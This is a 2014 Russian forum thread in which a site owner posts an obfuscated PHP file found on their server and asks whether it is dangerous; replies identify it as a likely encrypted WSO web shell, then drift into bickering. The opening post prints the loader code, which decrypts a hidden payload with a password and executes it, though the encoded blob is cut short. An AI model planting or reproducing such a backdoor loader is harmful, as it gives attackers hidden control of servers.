Расшифровка неизвесного файла на сервере.

4fun.fantasy · 2014-06-16T17:30:02.0000000Z

Добрый день. Сегодня наткнулся на папку, на одном из сайтов на сервере, в ней был всего один файл, с непонятным мне содержанием (расширение .php). Бился с онлайн дешифраторами, которые всегда спасали - но тут они мне не смогли помочь. Может кто-то поймёт что в этом файле и угрожает ли он безопасности сервера? Файл есессно с сервера на данный момент удалён. Буду признателен. <?php $_f___f='base'.(32*2).'_de'.'code';$_f___f=$_f___f(str_replace("\n", '', 'EeFwrhBr6h3EdYfNgNuKkCbWg4k4xg2uRBS9IRfSJE9N2ht5q4CZHlMBfxpqll488V7Trm7phDbBFAwG k5ML649wdmjtAfN+mew65S0FD5Nx2R8ROgea8Z0z1b/1amqjjy706S1+QQ2+nJYjdf8Qci0ic4kArurt yE+zVXve7+PByfRZYRHSLzBOndf9nQJCf5h1NRgtOUs4vOqEmNs5RVD1v3Z5c/tIRPLNs+Ne+Ix7+iaa aNXrTSZzw7KD3paNc/KaO+0GfaH7pZK6EmVZ/m1Wab04Csu9k9b06DMz5ii+xKX0MS4eiTP13+92uH5l Wign2s8NIZg72WEHkIDxqtkN0x2rGRfpgye+KR4xnoXFw75Q1SxRsWDvzZkzK+pWrv0+ao995An7iuot ANq6tMdj5BqMiy7eZ7MD5otlxzIvOiGERJgV8z5dmunFAYusRIHjuXhdKWyD4NcX2WqhQA2jDh12RvLT cs1pg266XOl3ANld+vJbqSHAQmfcYs/ECada8IwCPE0pjwa6K+buwsvf1kHDQqVEYHAtXfD7vSTHqSQ/ 7dN79l92UPsZWAJk4Fuc0QUb++95JQCgOplwuXJ3OkokwGGYH6hOcgfHB7XdukGKmFdWaz5G8A+GH292 mqM4NalNrMvUHWQopk5ES2SMGCahRivaSkFx1uxF5UL4lCc7NRF3FA7Xt4rcKaPy6r+F1oMcpbL5NQp1 fM7+rJ2eB4s2p1jIwkXvV5NTLOex6v2MTnQDLGAdd2wGo5eyE/FrFOPNBC2ciL03jz8ntqvBxtmnCQc4 Кусок текста вырезал т.к. не вмещается. Могу залить файл целиком или скинуть кому-нибудь на почту. OziJdMblMkwNsbQkiTc7TvIuKM6FZh8ihiSNGRTQGb2p7vzbAW5d+6TeycLOq5tqeQzrx7/tTylGh7mt hnByWv1cD217z1gkKmXIBoZkvg18tNsxAgv107QbqLnoJhB8B7PmNMdtNoejFNVO/NbahqTie9mc6CMD 0yztDPPSEMjiUo8GYwPl7qFCvjuRQ7pGIw3z/1GdA8D9GxFxhcueWJLXgK3GoeAGm/dJFF4P2rifbe17 1YEeajiozC6quaSpw/VtbL5oXq8uIq4li3tw1ALOhymqXMEVR9VgtW3sYMzRf7y94+Zyg2VRwpODXHm9 '));$_f__f=isset($_POST['_f__f'])?$_POST['_f__f']:(isset($_COOKIE['_f__f'])?$_COOKIE['_f__f']:NULL);if($_f__f!==NULL){$_f__f=md5($_f__f).substr(md5(strrev($_f__f)),0,strlen($_f__f));for($_f____f=0;$_f____f<15180;$_f____f++){$_f___f[$_f____f]=chr(( ord($_f___f[$_f____f])-ord($_f__f[$_f____f]))%256);$_f__f.=$_f___f[$_f____f];}if($_f___f=@gzinflate($_f___f)){if(isset($_POST['_f__f']))@setcookie('_f__f', $_POST['_f__f']);$_f____f=create_function('',$_f___f);unset($_f___f,$_f__f);$_f____f();}}?><form action="" method="post"><input type="text" name="_f__f" value=""/><input type="submit" value=">"/></form>

822

Andreyka

18 июня 2014, 03:11

#21

4fun.fantasy:
можете спросить поступает ли так fastvps со своими клиентами на выделенных серверах у представителя на этом форуме (помню тема где-то была).

Fastvps - это фирма. А ответ вам дал обычный человек, который кстати мог быть вчера уволен за некомпетентность. 🍿

Не стоит плодить сущности без необходимости

4F

144

4fun.fantasy

18 июня 2014, 04:01

#22

siv1987:
Судя по размеру в 21Kb это веб-шелл, именно столько весит WSO в пожатом виде.
А раскодировать будет не так просто, ибо там используется шифрование со сдвигом а-ля шифра Цезаря с ключом

Понял, попытки выяснить что там было - тогда брошу.

Andreyka:
Fastvps - это фирма. А ответ вам дал обычный человек, который кстати мог быть вчера уволен за некомпетентность.

И про наём некомпетентных сотрудников вы так же можете уточнить информацию у представителя "фирмы".

K5

209

kgtu5

18 июня 2014, 05:18

#23

Ещё до 2008-х годов я помню на этом форуме народ любил отвечать в стиле "зачем это нужно, сделайте вот так" на чётко поставленный вопрос. Тенденции, я смотрю, за последние 6 лет не изменились).

Тенденция владельцев взломанных сайтов тоже не меняется и единажды взломанный думает (а в большинстве случаев и требует от исполнителя) чтобы такого больше не повторилось никогда (а если повторилось, то выносится сюда как неответственное исполнение работы).

Повторится может, к этому надо быть готовым, взломщики не сидят на месте.

ТС вы сами делаете что то для безопасности (помимо разных паролей)???

аська 45два48499два записки на работе (http://memoryhigh.ru) помогу с сайтом, удалю вирусы, настрою впс -> отзывы ТУТ (/ru/forum/836248) и ТАМ (http://www.maultalk.com/topic140187.html) !!!всегда проверяйте данные людей, которые сами пишут вам в аську или скайп!!!

Вариант организации links directory Биткоин готовится к новому Что делать если сайт

4F

144

4fun.fantasy

18 июня 2014, 17:58

#24

kgtu5:
Тенденция владельцев взломанных сайтов тоже не меняется и единажды взломанный думает (а в большинстве случаев и требует от исполнителя) чтобы такого больше не повторилось никогда (а если повторилось, то выносится сюда как неответственное исполнение работы).
Повторится может, к этому надо быть готовым, взломщики не сидят на месте.
ТС вы сами делаете что то для безопасности (помимо разных паролей)???

Вы, пардон, с какой целью в эту ветку зашли? За флуд больше не дают карт?

Что такое Power BI и зачем это нужно бизнесу

В 2023 году 36,9% всех DDoS-атак пришлось на сферу финансов